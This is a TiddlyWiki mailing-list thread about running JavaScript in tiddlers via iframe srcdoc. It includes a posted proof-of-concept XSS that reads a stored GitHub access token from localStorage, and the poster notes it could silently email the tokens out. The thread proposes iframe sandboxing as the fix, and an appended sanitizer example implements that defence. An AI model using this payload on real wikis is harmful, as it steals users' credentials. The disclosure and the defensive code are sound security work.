It kind of sounds like the iFrame element should then be outright eliminated from the web entirely.
That might be problematic. Re security, couldn't any tiddler that is a javascript macro be altered for nefarious purposes just as easily as injecting malicious javascript into an iFrame?

On Monday, August 16, 2021 at 12:39:41 PM UTC-3 flanc...@gmail.com wrote:
> This seems EXTREMELY INSECURE. What is to stop an attacker from injecting malicious JS into a tiddler, regardless of whether it is "sandboxed"?
> Paste this Proof-of-Concept into a blank tiddler. What it does is steal your GitHub PAT if you have it configured, and alert it to you. While I have not done it here, I could easily make it both invisible and have it email me the PATs it gathers.
>
> CODE:
> <$vars vSrcDoc={{{ [[<body>
> <div id="clockDiv"></div>
> <script>
> document.getElementById('clockDiv').innerHTML = `<a id="xss" href="javascript:alert('Your GitHub Token is:'+localStorage.getItem('tw5-password-github')+'. If it is blank, you probably don\\'t have TW GitHub saving configured');"></a>`;
> document.getElementById('xss').click();
> </script></body>]] }}}>
> <iframe srcdoc=<<vSrcDoc>> style="border:none;width:100%;"></iframe>
> </$vars>
>
> Long-story-short, an attacker can easily bypass any sanitation TW employs, and harvest credentials from various sites. It is my belief that this issue needs to be fixed immediately, and brought to the attention of Jeremy and other devs.
>
> I would be happy to help on the repair process. I have some experience with PenTesting and fixing XSS vulnerabilities (mainly in my own applications). I would recommend adding a listener to TW changes, and checking for an iframe code. If it does contain this, TW should add a sandbox constraint on it (https://developer.mozilla.org/en-US/docs/Web/HTML/Element/iframe#attr-sandbox).
>
> On Monday, August 16, 2021 at 10:55:46 AM UTC-4 cj.v...@gmail.com wrote:
>
>> Updated one of the tiddlers in the JSON package. New version attached.
>>
>> The addition highlighted below:
>>
>> <body>
>> <div id="clockDiv"></div>
>> <script>
>> *document.oncontextmenu = function() {*
>> *  return false;*
>> *};*
>> let clockEl = document.getElementById("clockDiv");
>> ...
>>
>> The reason for the added code: block access to the back button in the iFrame (by blocking access to the entire menu), which winds up performing the back button operation on the entire browser page.
>>
>> On Sunday, August 15, 2021 at 11:27:41 PM UTC-3 Charlie Veniot wrote:
>>
>>> I don't know what made me think of this.
>>>
>>> In case this has not been brought up in a while (I doubt this is new to seasoned folk) ...
>>>
>>> I was thinking: could I use an iFrame to include simple javascript in a tiddler without getting into macros or plugins that enable javascript?
>>>
>>> And, if I could, then could I set things up so that the iFrame is showing javascript dynamically created by the tiddler?
>>>
>>> So here is a way to show a digital clock in TiddlyWiki, for non-programmers who just want to copy and paste javascript code from the web without figuring out how the javascript code works:
>>>
>>> Put this in a brand new tiddler:
>>>
>>> <$vars vSrcDoc={{{ [[<body>
>>> <div id="clockDiv"></div>
>>> <script>
>>> let clockEl = document.getElementById("clockDiv");
>>> function getClockTime() {
>>>   let date = new Date();
>>>   let hr = date.getHours();
>>>   let min = date.getMinutes();
>>>   let sec = date.getSeconds();
>>>   hr = ("0" + hr).slice(-2);
>>>   min = ("0" + min).slice(-2);
>>>   sec = ("0" + sec).slice(-2);
>>>   clockEl.innerHTML = `${hr}:${min}:${sec}`;
>>> }
>>> setInterval(getClockTime, 1000);
>>> </script></body>]] }}}>
>>> <iframe srcdoc=<<vSrcDoc>> style="border:none;width:100%;"></iframe>
>>> </$vars>
>>>
>>> Sneaky sneaky, has me wondering what kind of other fun things could be done...
>>>
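The mitigation proposed in the quoted thread (force a `sandbox` constraint onto every iframe) can be illustrated with an added example. This is not code from the thread or from TiddlyWiki itself; the function names, the `DEFAULT_POLICY` value and the HTML inputs are my own assumptions. It rewrites a chunk of rendered HTML so that every `<iframe>` carries a `sandbox` attribute, and it drops `allow-same-origin` whenever `allow-scripts` is also present, because that pair lets a same-origin frame remove its own sandbox. With the default `allow-scripts` policy the clock from the original post keeps running, but the `srcdoc` document gets an opaque origin instead of inheriting the wiki's, so reading the embedding page's `localStorage` from inside the frame throws a SecurityError rather than returning a stored token.

```javascript
// Added example (not TiddlyWiki code): give every <iframe> in rendered HTML a
// sandbox attribute and harden any sandbox value the author already wrote.
// DEFAULT_POLICY is an assumption: scripts may run, but the frame gets an
// opaque origin, so it cannot reach the embedding page's storage or cookies.
const DEFAULT_POLICY = "allow-scripts";

// Attribute tokenizer for the inside of a start tag: name, optional value in
// double quotes, single quotes, or unquoted. A bare attribute has value null.
const ATTR_RE = /([^\s"'=<>/]+)(?:\s*=\s*(?:"([^"]*)"|'([^']*)'|([^\s"'=<>`]+)))?/g;

function parseAttrs(attrs) {
  const list = [];
  let m;
  while ((m = ATTR_RE.exec(attrs)) !== null) {
    list.push({ name: m[1].toLowerCase(), value: m[2] ?? m[3] ?? m[4] ?? null });
  }
  return list;
}

function serializeAttrs(list) {
  return list
    .map(({ name, value }) =>
      value === null ? ` ${name}` : ` ${name}="${value.replace(/"/g, "&quot;")}"`)
    .join("");
}

// Find the '>' that ends a start tag, skipping any '>' inside quoted values
// (a raw srcdoc value such as srcdoc="<b>x</b>" must not cut the tag short).
function findTagEnd(html, start) {
  let quote = null;
  for (let i = start; i < html.length; i++) {
    const ch = html[i];
    if (quote) {
      if (ch === quote) quote = null;
    } else if (ch === '"' || ch === "'") {
      quote = ch;
    } else if (ch === ">") {
      return i;
    }
  }
  return -1; // unterminated tag
}

// Remove the escape hatch: allow-scripts together with allow-same-origin lets
// a same-origin frame delete its own sandbox attribute. Other tokens are kept.
function hardenPolicy(policy) {
  const tokens = policy.trim().split(/\s+/).filter(Boolean);
  if (tokens.includes("allow-scripts") && tokens.includes("allow-same-origin")) {
    return tokens.filter((t) => t !== "allow-same-origin").join(" ");
  }
  return tokens.join(" ");
}

// Rewrite every <iframe ...> start tag so it carries a (hardened) sandbox attribute.
function sandboxIframes(html, policy = DEFAULT_POLICY) {
  const opener = /<iframe\b/gi;
  let out = "";
  let pos = 0;
  let m;
  while ((m = opener.exec(html)) !== null) {
    const attrStart = m.index + m[0].length;
    const end = findTagEnd(html, attrStart);
    if (end < 0) break; // leave a malformed tail untouched rather than guess
    const list = parseAttrs(html.slice(attrStart, end));
    const existing = list.find((a) => a.name === "sandbox");
    if (existing) {
      existing.value = hardenPolicy(existing.value ?? "");
    } else {
      list.unshift({ name: "sandbox", value: policy });
    }
    out += html.slice(pos, m.index) + "<iframe" + serializeAttrs(list) + ">";
    pos = end + 1;
    opener.lastIndex = pos;
  }
  return out + html.slice(pos);
}

// Constructed sample: what a tiddler with an unsandboxed srcdoc iframe renders to.
const SAMPLE_RENDERED_HTML =
  '<p>Clock:</p><iframe srcdoc="&lt;body&gt;&lt;div id=&quot;clockDiv&quot;&gt;&lt;/div&gt;&lt;/body&gt;" style="border:none;width:100%;"></iframe>';

console.log(sandboxIframes(SAMPLE_RENDERED_HTML));
```

This works on the HTML string level so that it runs stand-alone; inside TiddlyWiki the rendering pipeline builds DOM nodes from widgets, so the equivalent production hook would apply the same `hardenPolicy` logic where the element's attributes are set on the DOM node. The policy is deliberately a fixed default rather than a per-tiddler setting, since a tiddler that can choose its own sandbox value can choose none.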
To view this discussion on the web visit https://groups.google.com/d/msgid/tiddlywiki/f03f0c64-d6b0-471c-9e6b-4c581498d733n%40googlegroups.com.